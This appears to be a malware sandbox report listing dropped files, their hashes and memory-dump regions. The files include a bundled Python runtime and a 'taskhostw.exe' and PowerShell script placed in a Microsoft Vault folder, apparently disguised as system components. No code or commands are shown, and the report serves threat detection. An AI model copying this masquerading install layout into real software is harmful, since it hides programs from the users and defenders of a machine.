db9a713e27fb20f00437d9dab32c1fac

SHA1
e7e0daf3371fdc04c5da6dfb0f9d1b93bc44620f

SHA256
7fcf88553a656abe5e4dc1a8e89d1e279ddec83de79e22f971ac04e7632708e9

SHA512
aaa035f5c5930233004855d9876b87d95ffaa5b8ce21f62fb499966bb8f29b5a5f4bf501fac5013f5e8ca8f9d1de8a0f1a288e346a87ef52ba2af43aeb56e500

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Vault\UserProfileProgramFiles\clientfiles\taskhostw\Lib\encodings\bz2_codec.py

Filesize
2KB

MD5
1aa105e7eed39a1b52b24b524b541ab0

SHA1
9de4eb2157ef2d0339eb565b0bd2ad6dba1172b3

SHA256
a0a34436976bb5137403c148cb8b332653f14caa6cdf102150e82646d5249a5e

SHA512
cda0cdaa96ecc52f5d57c9ca9d118b90d2e93630d47ed9cb99e0ba07a40d03470872676cb00b7dee70089045e9aab3bf37af09df075b7c5212947c9a17f66979

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Vault\UserProfileProgramFiles\clientfiles\taskhostw\Lib\encodings\charmap.py

Filesize
2KB

MD5
8a14214ef1c47a40c56c08a793fc9923

SHA1
73205dca66a87c26464472c25d39795bfff46f88

SHA256
1ea641e7c63c0a022a663f5d2024a71124272e088c246583d2d44cdddf548a32

SHA512
d7e94201e8168043be5bd6d1ce5b0720e653ec84a7abbeab6f99781228435c590d75b1fe3ae58b700287e6aabc7a44da4059561f22317b7a529263e1ad2a3c8f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Vault\UserProfileProgramFiles\clientfiles\taskhostw\Lib\encodings\cp037.py

Filesize
13KB

MD5
a28de4284dfaefec5cf40ee279c388f3

SHA1
5eef5925ac2c77227a03067e17808b5f10c41018

SHA256
fa3ff4b328c72315ec622cd62feac21189a3c85bcc675552d0ec46677f16a42c

SHA512
8fd7fd3c0a099a5851e9a06b10d6b44f29d4620426a04ae008eb484642c99440571d1c2c52966d972c2c91681ebd1c9bf524b99582d48e707719d118f4cd004a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Vault\UserProfileProgramFiles\clientfiles\taskhostw\Lib\encodings\cp1006.py

Filesize
13KB

MD5
8e2d801694a19b3a569f383708a5f7cb

SHA1
b1803cf5ff75a77bda42ced7c15e74861273b713

SHA256
1fdcd59d3277c3768de74dd8ce4f5f8beea569c00cbaa3a20714500f3508b8cb

SHA512
8dc24dbdc779c89cfa22e28d8175c2a32562ea1f9c070333565a7a8449deb5c8bf65a886e7a5360ef540e321b3a685530b1e53ae4638232b297450acec68b1e8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Vault\UserProfileProgramFiles\clientfiles\taskhostw\Lib\encodings\cp1026.py

Filesize
13KB

MD5
f453ed24a766166472b48010c7712629

SHA1
0f269160e99fa1acbc12b882aa9ed1976488b11e

SHA256
8c1d85be11a3a0a5e6a40101c68548480d0378df0414e3c16d9cbe9f923c028e

SHA512
420cd9363a0d72fca7b22300ce4ac0868320d945e0fce4c1f09659d4601168f96993d640bea0fbf9112948d17de08a41f674df5e65d34859b9bfb46d89d120d4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Vault\UserProfileProgramFiles\clientfiles\taskhostw\Lib\encodings\cp1125.py

Filesize
34KB

MD5
127b6641ae648ff494cd9285be4c61cc

SHA1
61464aa653d2aee959ee90809bdbf98075b1736e

SHA256
5286e2162d53a6b189d83b242bc04ab59a48bbbc4ecf094c11bc1542c0604279

SHA512
335ac036d6d88270e944ff01d3dcf1b1f1dbe38a75c534836e839deb474e776eeab76c08aa4bf150cea33594aafab33efd593246f958956a4894c2e1819b4c96

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Vault\UserProfileProgramFiles\clientfiles\taskhostw\Lib\encodings\cp1140.py

Filesize
13KB

MD5
c2f88ab320d40c3b1b6394f57a04af81

SHA1
a48b25abe903efa9c2b073783087ed06f23bca0f

SHA256
0451016f6a4b7013dea1ba35925412fbad743ddf46e857be2c272f2a2cb8d403

SHA512
19732a5b121339bd14bd0c7285fd7ee696e7432a28a7b140c92b6206e69011f2fce50b8b52bcae7c14db31444ec9808f27ce07ea4390434ecfbda096a5e022c6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Vault\UserProfileProgramFiles\clientfiles\taskhostw\Lib\encodings\cp1250.py

Filesize
13KB

MD5
164a9c1a625524fcb480dbe56076d738

SHA1
c21a1a50bbac7ef8d1cc3a2e093fe5ebdbbd35c4

SHA256
3ffea0100abef80f916bc2920b296b2eddd6ecb06fb3ca07549f95fc92ca1f11

SHA512
ab0160965cced9e7bf45d6a64c34a0ac363b4cf5d2447c303397db79c5f04ed861d9d0d5ff833c0685029e702534defe3ebb5ab5b05c5a5842050221cdc91a5b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Vault\UserProfileProgramFiles\clientfiles\taskhostw\Lib\encodings\cp1251.py

Filesize
13KB

MD5
e81de8e87bab1deff99125c66229f26e

SHA1
5800d009e3d4c428b7303532aad20ba3bbbe8011

SHA256
46fa091d1822434e8d0af7a92439607018872598fcde44026f413dd973f14c98

SHA512
b14bfe809cf20e5fd82cf5e435983dc5feaa4e5de19d16aa4bed7fd0cbfd18a429dd0129aa6058053709ce230ce38224f7ce15cfbcd75a803b04abc85fa9440b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Vault\UserProfileProgramFiles\clientfiles\taskhostw\Lib\encodings\cp1252.py

Filesize
13KB

MD5
52084150c6d8fc16c8956388cdbe0868

SHA1
368f060285ea704a9dc552f2fc88f7338e8017f2

SHA256
7acb7b80c29d9ffda0fe79540509439537216df3a259973d54e1fb23c34e7519

SHA512
77e7921f48c9a361a67bae80b9eec4790b8df51e6aff5c13704035a2a7f33316f119478ac526c2fdebb9ef30c0d7898aea878e3dba65f386d6e2c67fe61845b4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Vault\UserProfileProgramFiles\clientfiles\taskhostw\Lib\encodings\cp1253.py

Filesize
13KB

MD5
e86052cd641a07aa72686984073af47e

SHA1
d9caa17b52a5f48087f587b2996388da799955bf

SHA256
e0b0afbd19db367c34c505f99a2fccafc6bae3dfd4e316f86375179dcfc60a28

SHA512
7f87b2577902646c394fcc2d7a5407b05e23ac3cd07e7749cedc9898f3e357067729f586011862d9fc8604db13d0921b060471c3a52b6c17a0f7c5694dda7788

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Vault\UserProfileProgramFiles\clientfiles\taskhostw\Lib\encodings\cp1254.py

Filesize
13KB

MD5
490756413a61fc0954efa491244cd487

SHA1
849ec325801a2e2cc784a54590482593ff89a5a1

SHA256
0986acd9a25fe91c4720c912322253ad105ab951a2d0d364cf0e522e6e52c174

SHA512
bcdc7cb6c94600d15f9a3bfa51bdc0d289c997ac40ec4da1cb0d91b6bfe875968b6c2834fc03d306ee6a3d022955c1c3435864491af8548e82acc60e2a215601

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Vault\UserProfileProgramFiles\clientfiles\taskhostw\Lib\encodings\cp1255.py

Filesize
12KB

MD5
8b8e1cc22bef6ede6e44c4dd2a287ff6

SHA1
304930955df0499cbfdf90bfd9bb9a01d0059b23

SHA256
c039ad62ee73102915d989cf390f76896c335ca8dbcdd4ca27d5441f76e081be

SHA512
fa779a6e599816aaaa84c1fb715217de2341399d47e70a440a06e312ba69780e14cb3014d048c7005f5a9025b3ab8d508da052bfd678ad4e269f10cb1b35ae66

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Vault\UserProfileProgramFiles\clientfiles\taskhostw\Lib\encodings\cp1256.py

Filesize
12KB

MD5
2ccbf9b374ce98453955dad9848c90ff

SHA1
0e7b99d406e72af59f80405b9676988cd6881c40

SHA256
24a69e11902cc4054280ec2de38ee836d0be22eabdb9cdc56d9a7b63c8cddb06

SHA512
4a97c524f951de4cf08f2ef86f9aa9f4f421ba3327d07e0b883958057e6204a410f42e82e0c7dbbac8f3252065f96a4255a820753bd6ebe80254e1afe160fd3f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Vault\UserProfileProgramFiles\clientfiles\taskhostw\Lib\encodings\cp1257.py

Filesize
13KB

MD5
544a8ace12064e96c3e6a7db436f9f09

SHA1
adade6dc415731bcc23386df031ca5b003d09881

SHA256
902262c0640fc0f21cf85a86456dc33d43e51b07e6c961526bf7f7ed4ce2ab8d

SHA512
4830a946da25cbecdd1aeb5df055fd1961ef8e32936406889c39ee4f9acd6a15605dca448aa73df0a4be721bab6b04c03d02524918fcbb1499c4e7b60863bce2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Vault\UserProfileProgramFiles\clientfiles\taskhostw\Lib\encodings\cp1258.py

Filesize
13KB

MD5
11328d7e1cd433053c29bec6c739fb67

SHA1
fd2d141516eef65b903f552ac68ce30ae45a40a8

SHA256
a9e1e891dd1f28dea5abb5819aee1477156d288733eb2342f0696f1e5dd0a11d

SHA512
e643affbc683b99169fdb236184e25ddac58803fb11799bd56be44376953dd16f5e4c982cdfca8d8f79d0b142e294abab72f25202f012f4149371b20f408a3e0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Vault\UserProfileProgramFiles\clientfiles\taskhostw\Lib\encodings\cp273.py

Filesize
14KB

MD5
cf85b6224c5fe7c8ea6cbad1c1bb6155

SHA1
c8e3b07e4b5447ec58a280414228797ee6816a24

SHA256
016c8da778e50cbcf76815bbd8f6d0d33dbf1faf852726d85a5a47651c371033

SHA512
8ff744a4a173d2f046180a6a5c1a17715e7ada582278166b2a418de4c65441a47a040e8040e2385e02a24826082542d6cfbb3b548401abea8d0a17fefd43b660

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Vault\UserProfileProgramFiles\clientfiles\taskhostw\Lib\encodings\cp424.py

Filesize
12KB

MD5
85667b33899ec661331a9ca44cb36dec

SHA1
e755bf3aca17896638e62be91d9c8afe0a6ed725

SHA256
ae6e956b42cf3ae32e988833772fc040f8393da007048ad2b4e1d621fe6523e7

SHA512
4d7178c9ac351a644f6062d09fa9c28d569f48abf1cc4f906c93b8bccb151fe450e0a9b7a8ef26bd2851a7ce213f27a309f0ea6a2c999a7c5866432df9e6fbcb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Vault\UserProfileProgramFiles\clientfiles\taskhostw\Lib\encodings\cp437.py

Filesize
34KB

MD5
a11e9c869bd055d6c91354fffeb7644f

SHA1
b008e64c808a86312863c194c621214134b4c432

SHA256
7b0a9ae2e74d370354cc60cbcfb77af970364818be2e2a446187dcccf9e28acc

SHA512
3a628f1bb8d36845074b4fa66a8b91b5f8365c5677cc81afa5d7da1313f328e1b409a3c43249c9d62fadc2b71ce9e7ce70ccd3854ba7b8cbb19cfb79b8ad92fe

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Vault\UserProfileProgramFiles\clientfiles\taskhostw\Lib\encodings\cp500.py

Filesize
13KB

MD5
bee7333323d2bca3262f13c59414edd3

SHA1
57e74b1ba865c5198c26344b2f6f270350c014b4

SHA256
a5cac573ed357cb6c2a672d01696212c25e306936586d94be0d0130354a4db6f

SHA512
b9dd5137040dc57308093d9c71291668ce7cbedca11dbc0d85187c6dee568ca25f69b67f7fb08a2ca248d966ec622c7ce0dd35c0ba2cd77c860274a11a50827d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Vault\UserProfileProgramFiles\clientfiles\taskhostw\Lib\encodings\cp720.py

Filesize
13KB

MD5
9b7e8ab7c2ee4f82be09e14f3d3aea4c

SHA1
aa76bf3210ef70474330e0212a8b2edeb518dc5b

SHA256
016bdb7208a0d6bfaf8972c1f6bb4b3de39c77e026b49ed106866d592be4810b

SHA512
0e706cb3e9199663d2de2e6443f2c9e46279f11ed32bffe482c4262d7cbd1a30f49018588f96c037e147d9dce27f29c4abc1eaad230cf09b73317f5872967ccd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Vault\UserProfileProgramFiles\clientfiles\taskhostw\Lib\encodings\cp737.py

Filesize
34KB

MD5
bd60e98cc59c8bd60874f59a06e30f78

SHA1
d0086209ba6b3d56964ea7295a8ea54bc5aa02d7

SHA256
f2da9d418b2364c2e1a587b7a6e26ff5601c16aa7993070f2c955ddf2a1f860d

SHA512
377d0f87ddbb23d9ccaabe35085ef1e92fce766b01e55774f4371ea281a03825d141a6f905c90c419b19d09529a8185827c9f4fc6eb176bbade3dfb478afb1a0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Vault\UserProfileProgramFiles\clientfiles\taskhostw\Lib\enum.py

Filesize
81KB

MD5
3a87f9629edad420beb85ab0a1c4482a

SHA1
30c4c3e70e45128c2c83c290e9e5f63bcfa18961

SHA256
9d1b2f7dd26000e03c483bc381c1af20395a3ac25c5fd988fbed742cd5278c9a

SHA512
e0aed24d8a0513e8d974a398f3ff692d105a92153c02d4d6b7d3c8435dedbb9482dc093eb9093fb86b021a28859ab541f444e8acc466d8422031d11040cd692a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Vault\UserProfileProgramFiles\clientfiles\taskhostw\Lib\functools.py

Filesize
38KB

MD5
8aa5a8e74fcf05c4c263a49fb3563691

SHA1
f3c035800e36a34c4ea127fef847c87850f56d8f

SHA256
6bb54daf5f8e14a01fee74d58826eecd6cd14e6f7044e7d11db534ba0fabed9b

SHA512
037c2b588f0b3f042e1d35c4332b0c7afe28f17e7066ab22de91095899d59bd16914d13266ece5b6938cbe5f37e58a80e28b4730c238b2618d3ff5247f46b884

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Vault\UserProfileProgramFiles\clientfiles\taskhostw\Lib\genericpath.py

Filesize
5KB

MD5
f2da5a9bdbccabbdd44d309002ea9661

SHA1
9dd844c2f69be7c076b746f41f41b2ffaf7120a6

SHA256
c540a28c560234d4d00d3451dfdde05b404f81a38bde87086ce8773021e1cc1b

SHA512
c9e2465cd02976025a9831cfecb4c8e9b34d3df2725a801eaf5e4c26ef8f90ed69e545d5990f6353bf4450d8d4e2bd020f46b854a74ec1c06fab9a78f09c5f1c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Vault\UserProfileProgramFiles\clientfiles\taskhostw\Lib\keyword.py

Filesize
1KB

MD5
a10df1136c08a480ef1d2b39a1f48e4a

SHA1
fc32a1ff5da1db4755ecfae82aa23def659beb13

SHA256
1f28f509383273238ad86eda04a96343fa0dc10eeaf3189439959d75cdac0a0b

SHA512
603f6dc4556cbbd283cf77233727e269c73c6e1b528084e6c6234aefd538313b4acc67ca70a7db03e015a30f817fcfedda2b73de480963ae0eefd486f87463cd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Vault\UserProfileProgramFiles\clientfiles\taskhostw\Lib\locale.py

Filesize
78KB

MD5
2623610287100d352fbc0d1fbeeb4b29

SHA1
fb33a584ce2324e99548cf092794163894ad95bb

SHA256
f2a5793c0d629730c9f60ef11509484e04a92697ce603b30b7e9f1137cc48742

SHA512
78a1f7aa8c044b932e8e5147a1bb431bdfc9cedba234283828139ea4abdf1b7ed8ff40f14824048a0d80eb9b9f01ed661e4fb405593c1bce36e0dc3e65b5ed4e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Vault\UserProfileProgramFiles\clientfiles\taskhostw\Lib\operator.py

Filesize
11KB

MD5
dc7484406cad1bf2dc4670f25a22e5b4

SHA1
189cd94b6fdca83aa16d24787af1083488f83db2

SHA256
c57b6816cfddfa6e4a126583fca0a2563234018daec2cfb9b5142d855546955c

SHA512
ac55baced6c9eb24bc5ecbc9eff766688b67550e46645df176f6c8a6f3f319476a59ab6fc8357833863895a4ef7f3f99a8dfe0c928e382580dfff0c28ca0d808

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Vault\UserProfileProgramFiles\clientfiles\taskhostw\Lib\os.py

Filesize
40KB

MD5
5f906ed960f4b4bce0f7c155d9d0d3d3

SHA1
1c28ea0c9af46802e5827bcf77721f663942c48e

SHA256
0c991d83978e345654f1caa90bc4b2c22a29ffbe18018846cb5d60a03d32a358

SHA512
6f27b85b5280d8d59da73966d0aa2f6d0518a82eda1f25f2d30cf8dd6ff982d7dc93a37b2d46c62ffc91d0e6d45a20576d9a18d89b8db4796e2d13cdaa955ee4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Vault\UserProfileProgramFiles\clientfiles\taskhostw\Lib\random.py

Filesize
34KB

MD5
e4618af729b55daab2a37460e0e6cd01

SHA1
c2d9e16d1d63f87bf6406dbfd2ff052bfe348d4d

SHA256
dd90f2195fb0dfadf608e935ba2e879e3d9c23e9bc5de27ce88109a36e0ffcbe

SHA512
955102b37e6b77458ae452fbc2950cc77fcebcdfe49320f6b7e47d360bca3d357d372ef637d8d0d3273cda8c3cff6fdc3cd823339ce009c0d4c8b7d8f3c9f284

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Vault\UserProfileProgramFiles\clientfiles\taskhostw\Lib\reprlib.py

Filesize
6KB

MD5
dfda46ef7019ab30afa5183cf035263d

SHA1
b7cece019304f0c6836c148f85dd3c920c5cd654

SHA256
354fd4471a2d8c5972e67a38a8eb40040f12bd9b6acd260a889efed250770f0b

SHA512
62b6da4124537fe2e891aafe5e7c901368c6f498f5d0de83d524fa2653f9aec731bc8151790fcfe36900b65ff36bb0165142f074977e8b2c808bf0507257adb9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Vault\UserProfileProgramFiles\clientfiles\taskhostw\Lib\signal.py

Filesize
2KB

MD5
2286251f2525a65c0b525b048196f6a0

SHA1
2f876056bad6649056d9ee85fc9bc000ae4623e6

SHA256
0b7e3d3d39a120142dbf4875d7d79579cad8fee662add30c2375a797f0d2386e

SHA512
779d2135f2b1cd9ed4fc0b4f68fb78c7d4ed15257e939b09ee0b3a80fcdced16a0b60e0d182c61d0e6a18b5389f62edc533582b5afa93ea17e4c4efef8db00b7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Vault\UserProfileProgramFiles\clientfiles\taskhostw\Lib\subprocess.py

Filesize
88KB

MD5
93b0c900e0a94286f93f318864e18ef2

SHA1
cd748c102c5486da637a8ce74637774f3bf1670e

SHA256
4f08d583a95b415762d888fff499c19103040d4b7027e25a73d46c7e3d777d04

SHA512
15755797223a5b9d7e6793741c702c549daf498878e93c117276d7b3bb616c74e1cb19eebe47ca85b6bbb8860c7a531ef5f285cc1661daec1c854d74f6d451d3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Vault\UserProfileProgramFiles\clientfiles\taskhostw\Lib\threading.py

Filesize
60KB

MD5
ef96e5d3e37946573944a21a541f1c88

SHA1
b76a113076244ac30acfa56332aed387e7d645bd

SHA256
2e15f4e0500260a756868ac0609c4702b10634a5dee5d89926f9e3bd642089f1

SHA512
81607d3a99a2b6c4e18f74cc0a889df0cb7bcabc54e28f5e255dcf78928e78759f6b6a4d52e19d2b819c7a72dab5e9ff06da8477f43fdd4c36d91218ea938025

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Vault\UserProfileProgramFiles\clientfiles\taskhostw\Lib\types.py

Filesize
11KB

MD5
8303d9715c8089a5633f874f714643a7

SHA1
cdb53427ca74d3682a666b83f883b832b2c9c9f4

SHA256
d7ce485ecd8d4d1531d8f710e538b4d1a49378afacb6ff9231e48c645a9fa95e

SHA512
1a6ca272dde77bc4d133244047fcc821ffcb3adee89d400fe99ece9cf18ab566732d48df2f18f542b228b73b3402a3cace3cd91a9e2b9480b51f7e5e598d3615

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Vault\UserProfileProgramFiles\clientfiles\taskhostw\Lib\warnings.py

Filesize
21KB

MD5
99c3e7445f5de31e5c43e1d237ccf192

SHA1
b3e46cf39f5f783ccf2f17ed0fd68d39f8a18062

SHA256
35a18ed9056c5aadc9ea700ba3a03e79393abc43f631a2e5ccc042fe37b82e6e

SHA512
ba84701ed5e0e1f45b27f94d58c5d4abc269212224b6d4eeab3212605b06830729cb73c4971e98da2077ca1f2c86b3cb1ca1e2ebaa1e148e4793e7fee3bfb28b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Vault\UserProfileProgramFiles\clientfiles\taskhostw\python312.dll

Filesize
6.6MB

MD5
d521654d889666a0bc753320f071ef60

SHA1
5fd9b90c5d0527e53c199f94bad540c1e0985db6

SHA256
21700f0bad5769a1b61ea408dc0a140ffd0a356a774c6eb0cc70e574b929d2e2

SHA512
7a726835423a36de80fb29ef65dfe7150bd1567cac6f3569e24d9fe091496c807556d0150456429a3d1a6fd2ed0b8ae3128ea3b8674c97f42ce7c897719d2cd3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Vault\UserProfileProgramFiles\clientfiles\taskhostw\taskhostw

Filesize
546B

MD5
ed72a28be48a1abcbf268862d20c9578

SHA1
c0d6ae2aa59b35234b730162f2c98463b61d0534

SHA256
6ea02575f0d56cca39381b5074597d6e32ede708ed59c1124389864147599723

SHA512
aef5d85def49393dc61145d441b45555cfb54c6ad1dd7f17813092c0b18105617901516c84cb9cc71dcb184824731942e1fb950eddda6101efb86910439b21bd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Vault\UserProfileProgramFiles\clientfiles\taskhostw\taskhostw.exe

Filesize
99KB

MD5
2103a9838d560bcffa35f17a1c73df3b

SHA1
598296645cc3836c05a7b465d1fc09e6c8673935

SHA256
7a0f0ce3d8c05598a5bf13a721886ed67af8158bc3f62ecacc3380a9622b8361

SHA512
d55293d1794b7bdc61cba255ff4ce45e4ed208102fa8703eb5f8481ba2e9bfb84c24bad8be57a63f419728dc6635f74a79324c5186cd0a9b8547fbe69c751e9f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Vault\UserProfileProgramFiles\clientfiles\thread.manifest

Filesize
48KB

MD5
ed93549a7d540776e715a460ffd43f92

SHA1
1bd35d19af42767ae70d1664b7bff096cba5eec2

SHA256
8048d521370d35b4a3b55283aa02f4e942a01764418f90e1c0d874b0ecc66f5b

SHA512
c7095499771087b1182f501a21490ba5d6b812320119e909f6f33e85f6f9a72f13f265c58235ba0ac3a27cf93a14a5fe2e9db53ca83b4331a43b52fa292fa2c0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Vault\UserProfileProgramFiles\clientfiles\thread.ps1

Filesize
2KB

MD5
a38934f9a79ef23ae565ad1ada782b75

SHA1
0e84e8f33e1c0228dbf3ae082ad10c88ca6221bb

SHA256
f46e23b77782407b3688535acd5c870b3c06883c7d9f583d79115d1b8debec04

SHA512
e4359f83b8adee147a238f09b9ea2c52ed1fd402f874efbd6b5aeb249722ac9b4b18849b5cee116d6a7e8be2c6f079d1030a424cf1679806447ea78fc4b7bc07

Download Submit
C:\Users\Admin\AppData\Local\Temp\617fg7\thumbchace_windows_api.dll

Filesize
5KB

MD5
bd42f14bf564081b1f2d47375a310729

SHA1
a4ea76b409213628240cc5eb427fb1ec4a6445c5

SHA256
dfa72d23cf6cf9621f425f855a2fc06015f79c46288371a056cfe4cd1b760b0d

SHA512
c9c8259deac52af34504c1568a30e064c223f46ac72ca1e3709c24c73e26f2786e32e8998aaf4a16a43c0a4588711fa72789b2358fb79c7d574fc5f2ef3f4de0

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ebg4qe1a.utn.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/1028-914-0x0000000007C50000-0x00000000081F4000-memory.dmp

Filesize
5.6MB

Download
memory/1028-913-0x0000000006A60000-0x0000000006A82000-memory.dmp

Filesize
136KB

Download
memory/1028-912-0x0000000007600000-0x0000000007696000-memory.dmp

Filesize
600KB

Download
memory/1028-898-0x0000000005F00000-0x0000000006254000-memory.dmp

Filesize
3.3MB

Download
memory/3068-434-0x00000000065B0000-0x00000000065CE000-memory.dmp

Filesize
120KB

Download
memory/3068-438-0x0000000006AF0000-0x0000000006B0A000-memory.dmp

Filesize
104KB

Download
memory/3068-422-0x0000000005E00000-0x0000000005E66000-memory.dmp

Filesize
408KB

Download
memory/3068-423-0x0000000005F60000-0x0000000005FC6000-memory.dmp

Filesize
408KB

Download
memory/3068-420-0x00000000056D0000-0x0000000005CF8000-memory.dmp

Filesize
6.2MB

Download
memory/3068-419-0x0000000005010000-0x0000000005046000-memory.dmp

Filesize
216KB

Download
memory/3068-442-0x0000000006B80000-0x0000000006B88000-memory.dmp

Filesize
32KB

Download
memory/3068-421-0x0000000005610000-0x0000000005632000-memory.dmp

Filesize
136KB

Download
memory/3068-433-0x0000000005FD0000-0x0000000006324000-memory.dmp

Filesize
3.3MB

Download
memory/3068-435-0x0000000006600000-0x000000000664C000-memory.dmp

Filesize
304KB

Download
memory/3068-437-0x0000000007D20000-0x000000000839A000-memory.dmp

Filesize
6.5MB

Download
memory/3456-1125-0x0000000003430000-0x0000000003444000-memory.dmp

Filesize
80KB

Download
memory/3456-1126-0x0000000007C40000-0x0000000007C52000-memory.dmp

Filesize
72KB

Download
memory/3456-1030-0x0000000003400000-0x0000000003412000-memory.dmp

Filesize
72KB

Download
memory/3456-1017-0x0000000001590000-0x00000000015A4000-memory.dmp

Filesize
80KB

Download
memory/3456-1161-0x0000000008440000-0x000000000844A000-memory.dmp

Filesize
40KB

Download
memory/3456-1159-0x0000000007C50000-0x0000000007C5D000-memory.dmp

Filesize
52KB

Download
memory/4016-878-0x0000019F94540000-0x0000019F94562000-memory.dmp

Filesize
136KB

Download
memory/4016-888-0x0000019F945A0000-0x0000019F945A8000-memory.dmp

Filesize
32KB

Download
memory/4120-1139-0x0000000006160000-0x00000000064B4000-memory.dmp

Filesize
3.3MB

Download
memory/4120-1144-0x0000000007AF0000-0x0000000007B82000-memory.dmp

Filesize
584KB

Download
memory/4648-1081-0x00000000056D0000-0x0000000005A24000-memory.dmp

Filesize
3.3MB

Download
memory/4648-1082-0x0000000005D10000-0x0000000005D5C000-memory.dmp

Filesize
304KB

Download
memory/4868-1223-0x000000000E790000-0x000000000E791000-memory.dmp

Filesize
4KB

Download
memory/4868-1225-0x000000000E790000-0x000000000E791000-memory.dmp

Filesize
4KB

Download
memory/4868-1224-0x000000000E790000-0x000000000E791000-memory.dmp

Filesize
4KB

Download
memory/4868-1233-0x000000000E790000-0x000000000E791000-memory.dmp

Filesize
4KB

Download
memory/4868-1234-0x000000000E790000-0x000000000E791000-memory.dmp

Filesize
4KB

Download
memory/4868-1235-0x000000000E790000-0x000000000E791000-memory.dmp

Filesize
4KB

Download
memory/4868-1232-0x000000000E790000-0x000000000E791000-memory.dmp

Filesize
4KB

Download
memory/4868-1231-0x000000000E790000-0x000000000E791000-memory.dmp

Filesize
4KB

Download
memory/4868-1230-0x000000000E790000-0x000000000E791000-memory.dmp

Filesize
4KB

Download
memory/4868-1229-0x000000000E790000-0x000000000E791000-memory.dmp

Filesize
4KB

Download
memory/4956-1164-0x000002564CF40000-0x000002564CFEC000-memory.dmp

Filesize
688KB

Download
memory/4956-1192-0x000002564CF40000-0x000002564CFEC000-memory.dmp

Filesize
688KB

Download
memory/4956-1098-0x00007FFF75F30000-0x00007FFF75F31000-memory.dmp

Filesize
4KB

Download